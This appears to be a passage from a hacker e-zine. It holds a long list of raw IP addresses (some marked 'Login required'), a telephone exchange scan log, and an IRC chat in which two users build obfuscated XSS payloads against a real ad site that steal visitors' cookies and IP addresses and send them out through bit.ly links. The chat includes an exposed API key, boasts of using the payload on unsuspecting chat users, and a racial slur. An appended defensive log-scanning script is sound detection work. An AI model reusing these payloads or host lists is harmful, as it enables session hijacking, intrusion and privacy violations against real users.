- http://195.47.194.200/
- http://78.36.109.5/
- http://www.zodiac-bg.com/files/Jview.htm
- http://82.107.211.3/
- http://84.53.31.54/
- http://129.170.124.12/
- http://193.178.224.10/
- http://chrastal.homeip.net:5050/
- http://194.112.215.163/
- http://129.70.141.62/
- http://209.94.75.172/
- http://75.149.126.138:89/
- http://67.53.198.178/
- http://128.103.101.254/
- http://157.157.79.85/
- http://208.71.234.122/
- http://24.25.42.218:52210/
- http://65.182.241.193/
- http://216.117.210.183:86/
- http://203.213.212.174:1365/
- http://142.217.181.117:89/
- http://87.243.178.244/
- http://81.138.9.30:81/
- http://122.3.81.6:82/
- http://68.101.243.94:82/
- http://80.13.146.246/
- http://64.203.239.75/
- http://193.251.181.104/
- http://213.110.240.157/
- http://216.160.181.242:10083/
- http://67.242.57.128:86/
- http://www.rmackey.com/
- http://71.194.73.80:4343/
- http://209.117.235.143/
- http://71.157.136.110:81/
- http://216.129.211.131/
- http://217.133.212.61/
- http://143.107.3.149/
- http://210.230.126.237:82/
- http://62.147.232.188/
- http://216.137.100.129:81/
- http://210.230.133.76:82/
- http://222.3.77.52:81/
- http://222.11.124.75:81/
- http://116.64.17.198/
- http://210.249.10.81:81/
- http://220.217.129.21:81/
- http://210.249.21.157:82/
- http://222.1.186.218:81/
- http://221.119.133.176:81/
- http://213.160.168.72/
- http://61.204.127.233:82/
- http://222.3.114.56:81/
- http://71.110.145.16:89/
- http://89.234.195.78/
- http://99.135.117.196/
- http://65.99.253.134/
- http://222.11.60.180:81/
- http://61.117.29.119:81/
- http://82.176.123.82/
- http://66.203.223.50:82/
- http://24.20.88.10:84/
- http://24.19.205.82:8095/
- http://59.133.145.190:82/
- http://68.16.245.20/
- http://220.214.128.66:82/
- http://124.105.235.84/
- http://222.5.86.181:82/
- http://210.169.100.66:82/
- http://222.13.239.47:82/
- http://208.54.215.145/
- http://66.35.88.6/
- http://98.112.171.186:81/
- http://59.133.146.58:82/
- http://195.131.161.122:85/
- http://208.71.217.253:50001/
- http://220.217.122.193:81/
- http://222.15.48.210:82/
- http://220.217.130.205:81/
- http://98.190.143.254:23/
- http://200.124.240.142:8086/
- http://70.154.139.169:83/
- http://205.250.69.239:81/
- http://124.45.116.105:81/
- http://61.204.122.175:82/
- http://173.46.175.162:32000/
- Login required
- --------------
- https://24.206.4.253/index.htm
- http://24.231.40.38/
- http://24.231.41.232/
- http://24.231.50.181/
- http://24.231.54.90/
- http://24.244.132.179/
- http://24.244.134.63/
- http://24.244.135.87/
- http://24.244.135.250/
- http://216.137.0.39/auth.html
- http://216.137.11.89/
- http://24.244.145.66:8080/
- http://24.244.145.182/
- http://24.244.146.129/
- http://24.244.146.192/
- http://24.244.180.229/
- http://64.150.197.130/
- http://64.150.207.20/
- http://64.150.210.159/
- http://64.150.220.6/
- http://64.150.220.67/
- http://64.150.222.210/
- http://64.150.231.141/
- http://64.150.237.8/
- https://64.150.238.144/auth.html
- http://64.150.245.160/
- http://65.75.92.213/
- http://65.75.96.59/
- http://65.75.107.70/
- http://65.75.114.105/
- http://65.75.115.236/
- http://200.4.168.164/
- http://200.80.109.38/
- http://186.1.3.18/
- http://186.1.3.69/
- http://186.1.10.155/
- http://190.106.11.19/
- http://190.106.11.20/
- http://190.106.14.14/
- http://190.106.19.67/
- http://190.184.94.41/
- http://165.98.224.67/
- http://165.98.235.2/
- http://165.98.236.114/
- http://186.1.14.180/
- http://186.1.14.181/
- http://186.1.14.182/
- http://190.106.11.18/
- http://190.184.23.39/
- http://190.184.35.95/
- http://190.184.40.114/
- http://190.184.43.97/
- http://190.184.45.153/
- http://190.184.72.105/
- http://190.212.134.190/
- http://190.212.134.242/
- http://196.200.49.162/
- http://24.1.10.135:1050/
- http://24.1.13.39:8080/
- http://24.1.16.206/
- http://186.1.10.156/login.html?1600&1
- http://190.106.4.27/
- [==================================================================================================]
- -=[ 0x0a 303-833-00xx Scan
- -=[ Author: Shadytel, Inc
- -=[ Website: http://www.shadytel.com/
- 0001 - Expanded Announcement System (no supe)
- 0002 - Ringout
- 0003 - Ringout
- 0004 - Ringout
- 0005 - Reorder via SS7?
- 0006 - Burst of 2200 hz
- 0007 - Ringout
- 0008 - Busy signal via distant end
- 0009 - 102-type milliwatt, hangs up after ~3 cycles
- 0010 - Same as 0009
- 0012 - Busy via SS7
- 0013 - Coin deposit rec
- 0018 - LD service restricted rec
- 0020 - Reorder via SS7
- 0021 - Ringout
- 0022 - Ringout
- 0030 - Ringout
- 0031 - Ringout
- 0032 - Ringout
- 0034 - Ringout
- 0035 - Ringout
- 0036 - Ringout
- 0037 - Ringout
- 0038 - Modem - 7/E/1,
- *displays TID:, then garbage, then TID too long. Please try again.*
- 0039 - Something picks up silently after two rings. Faint clicking noise is sometimes audible.
- 0041 - Ringout
- 0057 - 105-type test
- 0058 - Something via SS7? Recheck
- 0065 - rec, "Remember, you must dial one plus your area code, or zero plus your area code and the
- number for long distance and operator assisted calls."
- 0066 - Dialing 1/0 not necessary rec
- 0067 - Dial 1 first rec
- 0068 - 100-type milliwatt
- 0069 - Dialing 0 not necessary rec
- 0070 - YCDNGT
- 0075 - YCDNGT
- 0076 - CBCAD/call your operator to help you
- 0077 - CBCAD/check your instruction manual
- 0078 - Permanent signal rec
- 0080 - Low tone
- 0081 - Same as 0078
- 0082 - Coin deposit rec
- 0083 - LD service restricted rec
- 0084 - CAC error rec
- 0085 - Tandem CBCAD recording?
- 0086 - Dialing CAC not necessary rec
- 0087 - Network difficulties rec
- 0089 - CAC error rec
- 0090 - ACB rec
- 0091 - Busy via SS7
- 0098 - Reorder via SS7?
- 0099 - DATU
- [==================================================================================================]
- -=[ 0x0b bit.ly Shenanigans (aka, XSS is hard bro)
- -=[ Author: Silks, elchupathingy
- -=[ IRC: irc.gonullyourself.org #gny
- Now, while we could neatly explain how we built up our implementation of this trick, it wouldn't
- really capture our thought process and just general fucking around. At some point, during the early
- hours of the morning, I pondered the idea of grabbing a fellow #gny chatter's IP for the lulz.
- Knowing that JavaScript has no reliable function for retrieving a client's IP, the best approach was
- to use a standard whatismyip.com site to grab the IP. With the IP address theoretically in my hands,
- I approached elchupathingy for ideas of how to export that information without any server-side ties.
- After some playing around, we came up with a solution that would gather and store a victim's IP
- address in a clever manner, and then redirect them to a final destination as expected. Here is our
- chat log (mildly edited to hide moments of stupidity) which explains how we built this up.
- -Silks
- Silks: do you know of a site that is like a persistent xss but not even xss?
- Silks: will just store info temporary
- Silks: like
- Silks: x.php?q=lolIstolethisguysip:1.1.1.1
- elchupathingy: could use bit.ly to store it
- Silks: how so
- elchupathingy: it stores links you shorten
- Silks: basically, did you see my XSS, JS+PHP implementation?
- elchupathingy: don't think so
- elchupathingy: hmm storing people's info using bit.ly is kind of sly now that i think about it
- elchupathingy: lol
- elchupathingy: http://bit.ly/gsfxLp
- elchupathingy: see what the link expands to
- Silks: how would you create that though from JS?
- elchupathingy: one sec
- elchupathingy: "http://api.bitly.com/v3/shorten?login=$bitlylogin&apiKey=$bitlyapi&format=json&longU
- rl=http://google.com/search?q=".shit_goes_here
- Silks: k
- elchupathingy: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5be2a28cc9f0b2
- 52495179&format=json&longUrl=http://google.com/search?q=luls
- elchupathingy: just a GET or inclusion should work
- Silks: I guess if you can see the details in your bit.ly account that will export the info
- elchupathingy: http://google.com/search?q=USER:elchupathingy:PASS:lolpasssowrd
- elchupathingy: thats what it would look like
- Silks: I know man
- Silks: but you are ignoring the actual problem
- Silks: the point is, getting the data from the victims client to you
- Silks: so if bit.ly account store recently created urls
- Silks: then you can access that bit.ly and extract the info
- elchupathingy: ya
- elchupathingy: woot got the cookie via xss and bit.ly
- elchupathingy: lol
- elchupathingy: in a ungodly long xss string
- Silks: rofl
- Silks: so like
- elchupathingy: <script>;var x=new XMLHttpRequest();x.open(String.fromCharCode(71,69,84),String.fromC
- harCode(104,116,116,112,58,47,7,97,112,105,46,98,105,116,108,121,46,99,111,109,47,118
- ,51,47,115,104,111,114,116,101,110,63,108,111,103,105,110,61,101,108,99,104,117,112,9
- 7,116,104,105,110,103,1,38,97,112,105,75,101,121,61,82,95,51,49,54,56,57,53,49,55,55,
- 99,53,98,101,50,97,50,57,99,99,57,102,48,98,50,53,50,52,57,53,49,55,57,38,2,111,114,1
- 09,97,116,61,106,115,111,110,38,108,111,110,103,85,114,108,61,104,116,116,112,58,47,4
- 7,103,111,111,103,108,101,26,99,11,10,47,115,101,97,114,99,104,63,113,61).concat(docu
- ment.cookie));x.onreadystatechange=function(){};x.send();</script>
- elchupathingy: lol
- elchupathingy: ungodly long
- Silks: win
- Silks: funny thing is
- Silks: you can then just bit.ly that long url
- elchupathingy: exactly lol
- elchupathingy: and bit.ly will keep track of the people that click on it lol
- elchupathingy: at the same time of sending you their cookie
- Silks: guessing the api can retrieve links too
- Silks: so you can probably write a quick app to grab it back
- elchupathingy: yep
- elchupathingy: well what ya mean?
- elchupathingy: short url to the info?
- Silks: well
- Silks: say you wanna xss like 100 people
- Silks: everytime someone gets owned they create a new bit.ly
- Silks: so you write an app that connects to bit.ly api and retrieves new bit.ly's
- Silks: and from that grabs the redirect url and parses the data
- elchupathingy: maybe
- elchupathingy: have to look over the api real quick
- Silks: but yeah you can break it down to two commands
- elchupathingy: can get the countries for each link, statistics on number of clicks and referrrers
- Silks: bit_xxs_ify <data you want>
- Silks: spits out a bit.ly link that links to the long url
- Silks: I guess somehow you'd need to inject what you want
- Silks: like "document.cookie"
- Silks: or just have a menu of all the options
- Silks: bit_xss_ify cookie
- Silks: bit_xss_ify ip
- Silks: etc
- Silks: then you'd need
- Silks: bitly_to_data
- elchupathingy: ok can get the top 100 urls
- elchupathingy: through their api
- Silks: which will grab all your bit.ly urls and push new ones into db
- elchupathingy: http://bit.ly/fUGVEO
- Silks: pro stream music
- elchupathingy: click that wanna see if it works
- Silks: put it in search box
- Silks: didn't exe
- Silks: https://api-ssl.bitly.com/v3/user/clicks?access_token=BITLY_ASSIGNED_ACCESS_TOKEN&days=7
- Silks: oh nvm
- elchupathingy: nah got it
- elchupathingy: __qca=A0-153091312312-1291239025123263; __utmz=201001501.1201336810.6.6|utmccn=(refer
- ral)|utmcmd=referral|utmcct=/english/4245268-hf-trance-tiesto-vs-mark-knight-feat-din
- o-beautiful-world-original-mix.html; TRUID=12957903034531; CKTIME=1301436534; __utma=
- 251001561.940844074.1295790257.1297648116.1301436811.6
- Silks: right realtime_links
- elchupathingy: lol
- Silks: what's that?
- elchupathingy: your click
- Silks: lolz
- Silks: weird how that was referrer
- Silks: was from a blank tab
- elchupathingy: ya
- elchupathingy: but ya works fine
- Silks: stop stealing mah cookies
- elchupathingy: nom nom cookies
- Silks: ahh it was just cookies
- Silks: weird, my cookies show all that info? :\
- elchupathingy: ya
- Silks: ahh google analytics bs
- elchupathingy: TRUID=13018098525591; CKTIME=1301809854; popunder=yes; popundr=yes; setover18=1
- Silks: tracking cookie
- elchupathingy: thats mine
- Silks: check my latest one
- Silks: sec
- elchupathingy: http://bit.ly/hbMGMA much better lol
- Silks: WHY?
- elchupathingy: cats are awesome
- elchupathingy: lol
- elchupathingy: u know
- elchupathingy: that hurts my feelings
- Silks: rofl
- Silks: was trying to tamper data it
- Silks: but realised that wasn't the actual cookie
- elchupathingy: oh haha
- Silks: so just spammed your link
- Silks: lolz
- elchupathingy: with hte same thing?
- Silks: pro music
- Silks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5ce2a29cc9f0b252495179
- &format=json&longUrl=http://google.com/search?q=ELCHUPATHINGY_IS_A_NIGGER
- elchupathingy: doesn't work with the same thing lol
- Silks: i can change the cookie in tamper data
- Silks: but
- Silks: the js is grabbing document.cookie
- Silks: and I can't change the url
- Silks: maybe in webgoat but cba loading that
- elchupathingy: ah
- elchupathingy: but that hurts
- elchupathingy: i mean all caps
- Silks: shutup
- Silks: you stole my cookies
- elchupathingy: you clicked the fucking link lol
- Silks: I trusted you ;(
- elchupathingy: haha
- Silks: bah this is so dumb
- elchupathingy: lol
- elchupathingy: hmm
- elchupathingy: but the bit.ly thing is nice because it guarantees unique cookies
- Silks: what do you mean?
- elchupathingy: it hashes the url
- elchupathingy: and my username
- elchupathingy: so if the same person comes to the site the cookie will probably be the same and not
- be sent again
- elchupathingy: see if anyone in #gny clicks my link lol
- Silks: nub
- Silks: shoulda got it to steal their ip
- elchupathingy: lol
- elchupathingy: well too late
- Silks: can do it later
- elchupathingy: ya
- elchupathingy: oh thats cool u can modify what the hashes bit.ly goes to
- elchupathingy: so u could edit the xss as its happening lol
- elchupathingy: nvm just title
- Silks: <!--#echo var="REMOTE_ADDR"-->
- Silks: weird
- Silks: fucking ssi shit
- elchupathingy: ya
- elchupathingy: well nvm not getting anything from the two clicks lol
- Silks: hmm
- elchupathingy: but there seems to be confusion over what it is
- Silks: that xss, can you get it to alert?
- elchupathingy: ya it's the same one i used to get your cookie
- elchupathingy: just have a feeling they are using noscript
- Silks: where is it executing?
- elchupathingy: in body
- Silks: the results span?
- elchupathingy: <div class="response_time">Results for <span>
- Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Edocument.write(document.
- cookie);%3C/script%3E
- Silks: ahh
- Silks: works
- Silks: alert doesn't
- elchupathingy: oh no strings
- elchupathingy: gets escaped
- elchupathingy: <script>alert(123)</script> works
- Silks: what I just pasted works
- elchupathingy: ya
- Silks: weird that document.alert doesn't work
- Silks: or
- Silks: yeah i'm just being dumb
- elchupathingy: lol
- Silks: hmm
- Silks: there is one whatismyip site that returns your ip as text with a specific url
- elchupathingy: ya i used that
- Silks: link
- elchupathingy: sec
- elchupathingy: http://www.whatismyip.com/automation/n09230945.asp
- Silks: hmm
- Silks: technically got it working
- Silks: but getting owned by access-control-allow-origin
- elchupathingy: getting the ip? or getting it to work as a xss?
- Silks: printing the ip
- Silks: once I got it, easymode
- Silks: that specific XSS site though doesn't allow for it
- elchupathingy: ah
- Silks: hmm
- Silks: but then, that is odd that yours works
- Silks: ahh, something to do with actually accessing the method
- Silks: as readystagechange or w/e
- elchupathingy: im sending the request which is cool
- Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Evar%20x%20=%20new%20XMLH
- ttpRequest();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47,4
- 7,99,104,101,98,107,105,112,46,99,121,110,100,110,115,46,99,111,109,47));x.onreadystatechange
- =function(){%20alert(x.status);%20};x.send();%3C/script%3E
- Silks: SAFE
- Silks: honestly
- Silks: not a dirty liar like you
- elchupathingy: lol
- elchupathingy: 0,0,0,0
- Silks: ?
- elchupathingy: alert boxes
- Silks: yeah
- Silks: that's with x.status
- Silks: should be 200
- Silks: if you fire up JS console you will see the error
- elchupathingy: not getting an error
- Silks: browser?
- elchupathingy: ff4
- Silks: oh it's fucking chrome
- elchupathingy: im mean i get a error on the page but its there no matter what
- elchupathingy: $(document).pngFix
- elchupathingy: is not a function
- Silks: although it's still not quite right
- Silks: still should return 200
- elchupathingy: ya
- Silks: well it is grabbing 200
- Silks: something up with code
- Silks: meh down to this origin bs
- Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Evar%20x%20=%20new%20XMLH
- ttpRequest%28%29;x.open%28String.fromCharCode%2871,69,84%29,String.fromCharCode%28104,116,116
- ,112,58,47,47,99,104,101,99,106,105,112,46,100,121,110,100,110,115,46,99,111,109,47%29,true%2
- 9;x.onreadystatechange=function%28%29{if%28x.readyState%20==%204%29%20{%20if%28x.status%20==%
- 20200%29%20{%20alert%28x.responseText%29;%20}}};x.send%28null%29;%3C/script%3E
- Silks: code effectively works
- Silks: well maybe, on another host
- Silks: but if you can host a file elsewhere then you can either chain JS where it does work or use
- PHP etc
- elchupathingy: ya
- elchupathingy: think i got it
- elchupathingy: one sec
- elchupathingy: Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3E;var%20x%
- 20=%20new%20XMLHttpRequest%28%29;x.open%28String.fromCharCode%2871,69,84%29,String.fr
- omCharCode%28104,116,116,112,58,47,47,96,111,105,46,104,111,115,116,105,112,46,105,11
- 0,102,111%29,true%29;x.onreadystatechange%20=function%28%29{if%28x.readyState==4%29{a
- lert%28x.responseText.match%28new%20RegExp%28String.fromCharCode%2892,100,120,49,44,5
- 1,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49
- ,44,51,125%29%29%29%29;}};x.send%28%29;%3C/script%3E
- elchupathingy: http://bit.ly/f1Ygcc :D
- Silks: nice work elchupathingy
- Barney-: =]
- Barney-: what happened
- Silks: umm, we were messing around with XSS
- Barney-: rgr
- Silks: now have XSS code that can steal your IP
- Silks: well, it grabs the IP, gonna add it to what elchu was working on earlier, storing it in
- bit.ly links
- Barney-: hmm
- Silks: yeah Barney-, check this
- Barney-: ??
- Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3E;var%20x%20=%20new%20XML
- HttpRequest();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47,
- 47,97,112,105,46,104,111,115,116,105,112,46,105,110,102,111),true);x.onreadystatechange%20=%2
- 0function(){if(x.readyState==4){alert(x.responseText);}};x.send();%3C/script%3E
- Silks: this will print the response page of a whatismyip site
- Barney-: very cool
- Silks: I was trying with a different site and it was failing
- Barney-: thats real cool actually
- Silks: elchu tried with that one
- Silks: and then used regex
- Silks: so
- Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=<script>;var%20x%20=%20new%20XMLHttp
- Request();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47,47,9
- 7,112,105,46,104,111,115,116,105,112,46,105,110,102,111),true);x.onreadystatechange%20=functi
- on(){if(x.readyState==4){alert(x.responseText.match(new%20RegExp(String.fromCharCode(92,100,1
- 23,49,44,51,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,
- 49,44,51,125))));}};x.send();</script>
- Silks: also we were discussing how to export info and talked about creating bit.ly links with APIs
- Silks: found out that it is possible to retrieve newly created links in the API too
- Silks: so..
- Barney-: but
- Barney-: how do you figure out
- Barney-: the bit.ly link
- Barney-: after its been created
- Silks: because of a bit.ly account
- Silks: so
- Silks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5ce2a29cc9f0b252495179
- &format=json&longUrl=http://google.com/search?q=
- Silks: will create the url
- Barney-: ah ok ok
- Barney-: so you login to the account
- Silks: and you can export the data but adding it to q=
- Barney-: but we don't want IPs we want coookies
- Silks: idd
- Silks: so
- Silks: if you look at the url above
- Silks: you just do
- Silks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895277c5ce2a29cc9f0b252495179
- &format=json&longUrl=http://google.com/search?q= + document.cookie
- Barney-: ah rgr
- Silks: specifically that above looks like
- Silks: String.fromCharCode(104,116,116,112,58,47,47,97,112,105,46,98,105,116,108,121,46,99,111,109,4
- 7,118,51,47,115,104,111,114,116,101,110,63,108,111,103,105,110,62,101,108,99,104,117,112,97,1
- 17,104,105,110,103,121,38,97,112,105,75,101,121,61,82,95,51,49,54,56,57,53,49,55,55,99,53,98,
- 101,50,97,50,57,99,99,57,102,48,98,50,53,50,52,57,53,49,55,57,38,102,111,114,109,97,116,61,10
- 6,115,111,110,38,108,111,110,103,85,114,108,61,104,116,116,112,58,47,47,103,111,111,103,108,1
- 01,46,99,111,109,47,115,101,97,114,99,104,63,113,61).concat(document.cookie));
- Silks: so since I've woke up and elchu found the ip, I'm gonna combine both of them so it will store
- an IP in a bit.ly account
- Barney-: ya but in what type of attack scenario would IP be helpful?
- Silks: was saying before, obviously we can just store all this info in the same way I did with my
- XSS session stealer. call a .php and store it in a db
- Barney-: dont get me wrong its cool, just wondering application
- Barney-: could do it easier
- Barney-: and be like
- Barney-: hey visit www.silks.com/index.php?id=4 (where id isn't even a var...)
- Barney-: it'll 404, and show up in access_log
- Barney-: voila
- Silks: hence what I said above but yeah
- Silks: this is just a way of doing it without any hosting etc
- Barney-: true
- Silks: and pretty interesting to be storing info in bit.ly links
- Silks: that page wouldn't 404 if you just added a get var
- Silks: funny thing is, when you've made the full XSS you can just package it up in a bit.ly
- Silks: elchu posted it in #gny and a couple of people clicked and didn't even understand what
- happened
- Silks: specifically, Compound and jmp got XSS'ed and knew no better
- Barney-: hahah
- Barney-: a bit.ly starts the XSS
- Barney-: and ends up in a bit.ly
- Barney-: hence why I don't trust you
- Barney-: and i go curl -I silks-dumb-links.com
- Silks: almost done
- Silks: gonna own #gny
- Silks: Barney-
- Silks: mind testing this?
- Silks: http://bit.ly/e93lCU
- Silks: bit.ly/gvZPM8
- Barney-: Location: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=<script>var x = new XMLH
- ttpRequest();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47
- ,47,92,112,105,46,103,111,12,116,105,112,46,105,110,102,111),true);x.onreadystatechange =fu
- nction(){if(x.readyState==4){var ip = x.responseText.match(new RegExp(String.fromCharCode(9
- 2,100,123,49,44,51,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49,44,51,125,92,46,92
- ,100,123,49,44,51,125)));var y=new XMLHttpRequest();y.open(String.fromCharCode(71,69,84),St
- ring.fromCharCode(104,116,116,112,58,47,47,97,112,105,46,98,105,116,108,121,46,99,111,109,4
- 7,118,51,47,115,104,111,114,116,101,110,63,108,111,103,105,110,61,115,105,108,107,115,121,3
- 8,97,112,105,75,101,121,61,82,95,98,100,102,57,54,101,56,51,55,49,51,99,50,50,55,48,50,52,5
- 3,55,55,48,102,55,101,99,56,48,56,98,49,100,38,102,111,114,108,97,116,61,106,115,111,110,38
- ,108,111,110,103,85,114,107,61,104,116,116,112,58,47,44,103,111,111,103,108,101,46,99,111,1
- 09,47,115,101,97,114,99,104,63,113,61).concat(ip));y.send();}};x.send();</script>
- Barney-: MIME-Version: 1.0
- Barney-: Content-Length: 1177
- Barney-: how do you pass a mime-version
- Barney-: with no mime type
- Silks: probably to do with the bit.ly link
- elchupathingy: just woke up
- Silks: tricked a few people lolz
- elchupathingy: ya saw
- elchupathingy: i was happy with the ip lol
- elchupathingy: but having to add in the random ass semicolons was annoying
- Silks: I'm thinking it might be possible to use browser location tracking to grab data
- elchupathingy: probably
- Silks: you know the browser sends a list of all the access points and macs near you
- Silks: crazy shit
- Silks: then you can use those macs with google api to triangulate your position
- elchupathingy: never tried to use it
- Silks: crazy how much data your browser sends though
- elchupathingy: ya
- Silks: would be lol to XSS->triangulated position
- Silks: similar shit to what samy did
- Silks: but without being a fucking tool
- elchupathingy: heh
- elchupathingy: well you can get it but ff asks for permission to get the lat,lng
- Silks: yeah
- Silks: but if location tracking is enabled it goes through
- elchupathingy: true then its fucking simple lol
- Silks: you're fucking simple
- Silks: think only in the past 6 months-year they started asking users tbh
- elchupathingy: function loc(p) { alert( p ); }navigator.geolocation.getCurrentPosition(loc);
- elchupathingy: er
- elchupathingy: function loc(p){alert(p.coords.latitude+","+p.coords.longitude);};navigator.geolocati
- on.getCurrentPosition(loc);
- Silks: listening to that song you stole from my cookies
- d4rK3r: who is more awesome then i?
- http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3cscript%3e%3bvar+x+%3d+new+XMLHttpRequest
- ()%3bx.open(String.fromCharCode(71%2c69%2c84)%2cString.fromCharCode(104%2c116%2c116%2c112%2c58%2c47%
- 2c47%2c97%2c112%2c105%2c46%2c104%2c111%2c115%2c116%2c105%2c112%2c46%2c105%2c110%2c102%2c111)%2ctrue)
- %3bx.onreadystatechange%3dfunction()%7bif(x.readyState%3d%3d4)%7bvar+ip+%3d+x.responseText.match(new
- +RegExp(String.fromCharCode(92%2c100%2c123%2c49%2c44%2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44
- %2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44%2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44%2c5
- 1%2c125)))%3bvar+y+%3d+new+XMLHttpRequest()%3by.onreadystatechange+%3d+function()%7bif(y.readyState%
- 3d%3d4)window.location%3dString.fromCharCode(103%2c116%2c116%2c112%2c58%2c47%2c47%2c98%2c105%2c116..
- ..d%3by.open(+String.fromCharCode(71%2c69%2c84)%2cString.fromCharCode(104%2c116%2c116%2c112%2c58%2c4
- 7%2c47%2c97%2c112%2c105%2c46%2c98%2c105%2c116%2c108%2c121%2c46%2c99%2c111%2c109%2c47%2c118%2c51%2c47
- %2c115%2c104%2c111%2c114%2c116%2c101%2c110%2c63%2c108%2c111%2c103%2c105%2c110%2c61%2c101%2c108%2c99%
- 2c104%2c117%2c112%2c97%2c116%2c104%2c105%2c110%2c103%2c...57%2c99%2c99%2c57%2c102%2c48%2c98%2c50%2c5
- 3%2c50%2c52...c61%2c106%2c115%2c111%2c110%2c38%2c108%2c111%2c110%2c103%2c85%2c114%2c108%2c61%2c104%2
- c116%2c116%2c112%2c58%2c47%2c47%2c103%2...2c97%2c114%2c99%2c104%2c63%2c113%2c61).concat(ip).concat(d
- ocument.cookie))%3by.send()%3b%7d%3b%7d%3bx.send()%3b%3c%2fscript%3e
- The XSS string shown above is the final product of the preceding discussion: it grabs the user's IP
- and cookie and stores them using the bit.ly method also outlined above.
- The simple bit.ly API makes this method of cookie grabbing simple and effective. Retrieving the
- cookie information is a single request to the bit.ly service, and all of the relevant information
- is returned in an XML or JSON string. Duplicate entries are effectively nulled by the way bit.ly
- hashes the URL to create its shortened ones. Accounts are easily created, so the links and the
- stored information can be distributed amongst many different bit.ly accounts, which makes it much
- harder to find the sole source of the links. Combining this with other URL shortening services such
- as goo.gl, on.fb.me, and tinyurl can make it a very robust method of cookie stealing. The XSS string
- above can be tweaked to hide its real intentions and works against anyone who does not question
- links sent to them.
- A major weakness of this technique is that it relies on JavaScript, so browsers that employ NoScript
- will not be affected. Other standard XSS techniques and server-side files could ensure that if you
- can't grab both the IP and the cookie, you can at least grab an IP. As simple as this technique may
- be, there is a lot more potential for further privacy and security breaches if you think outside
- the box. Not to mention that we think storing data in bit.ly is pretty hilarious.
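- From the defender's side, the same property that makes this trick convenient (the stolen data has
- to travel in the longUrl parameter of a shortener's create-link API) is what makes it visible in an
- egress or proxy log. The following Python sketch is an added example, not code from the zine or
- its authors: it screens a constructed proxy log for requests to the bit.ly v3 shorten endpoint
- whose longUrl carries cookie-like "name=value; name=value" pairs or an IPv4 address. The log
- format, the login/apiKey placeholders and the client addresses are all constructed assumptions.

```python
"""Screen proxy log lines for cookie/IP exfiltration hidden in URL-shortener API calls (added example)."""
import re
from urllib.parse import urlsplit, unquote

# Constructed sample of an egress/proxy log: "<time> <client> <method> <url>".
# login, apiKey and client addresses are placeholders, not values taken from the zine.
SAMPLE_PROXY_LOG = """\
2011-04-03T10:12:01Z 192.0.2.10 GET http://www.example.com/index.html
2011-04-03T10:12:05Z 192.0.2.10 GET http://api.bitly.com/v3/shorten?login=someuser&apiKey=R_EXAMPLEKEY&format=json&longUrl=http://example.com/?ref=spring
2011-04-03T10:12:09Z 192.0.2.10 GET http://api.bitly.com/v3/shorten?login=someuser&apiKey=R_EXAMPLEKEY&format=json&longUrl=http://google.com/search?q=sid%3Dabc123%3B%20prefs%3Ddark%3B%20over18%3D1
2011-04-03T10:12:12Z 192.0.2.10 GET http://api.bitly.com/v3/shorten?login=someuser&apiKey=R_EXAMPLEKEY&format=json&longUrl=http://google.com/search?q=198.51.100.7
"""

# (host, path) pairs of link-creation APIs the detector knows about. Assumption: only the
# bit.ly v3 endpoint from the discussion is listed; other shorteners are added the same way.
SHORTENER_APIS = {
    ("api.bitly.com", "/v3/shorten"),
}

# Two or more name=value pairs joined by ';' is the shape document.cookie has.
COOKIE_PAIRS = re.compile(r"[A-Za-z_][\w\-]*=[^;&\s]*(?:;\s*[A-Za-z_][\w\-]*=[^;&\s]*)+")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
LONG_URL = re.compile(r"(?:^|&)longUrl=([^&]*)")


def inspect_request(url):
    """Return the reasons one requested URL looks like shortener-based exfiltration ([] if none)."""
    parts = urlsplit(url)
    if (parts.hostname, parts.path) not in SHORTENER_APIS:
        return []
    match = LONG_URL.search(parts.query)
    if not match:
        return []
    # The smuggled data rides in the query string of the *inner* URL, so decode and split that.
    inner = urlsplit(unquote(match.group(1)))
    payload = unquote(inner.query)
    findings = []
    if COOKIE_PAIRS.search(payload):
        findings.append("cookie-like pairs in longUrl")
    if IPV4.search(payload):
        findings.append("ipv4 address in longUrl")
    return findings


def scan_proxy_log(text):
    """Run inspect_request over every log line; return one alert dict per suspicious request."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        when, client, _method, url = line.split(maxsplit=3)
        findings = inspect_request(url)
        if findings:
            alerts.append({"time": when, "client": client, "url": url, "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(alert["time"], alert["client"], ", ".join(alert["findings"]))
```

- On the sample log the first shorten call (a plain marketing link) passes, while the two that carry
- a cookie string and an IP in the inner q= parameter are flagged. A browser has little legitimate
- reason to call a shortener's API directly, so even a bare "shortener API hit from a browser user
- agent" rule is a cheap first signal before the content checks above.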
- [==================================================================================================]
- -=[ 0x0c Programming Challenge
- -=[ Author: storm
- -=[ Email: storm@gonullyourself.org
- -=[ Website: http://gonullyourself.org/
- Sorry, no programming challenge this issue. If you have ideas, don't hesitate to shoot us an email.
- --------------------------------------------------------------------------------
- Last issue, we asked readers to compare the depth-first search and breadth-first search routing
- algorithms against a given graph.
- Graph Solution by melte
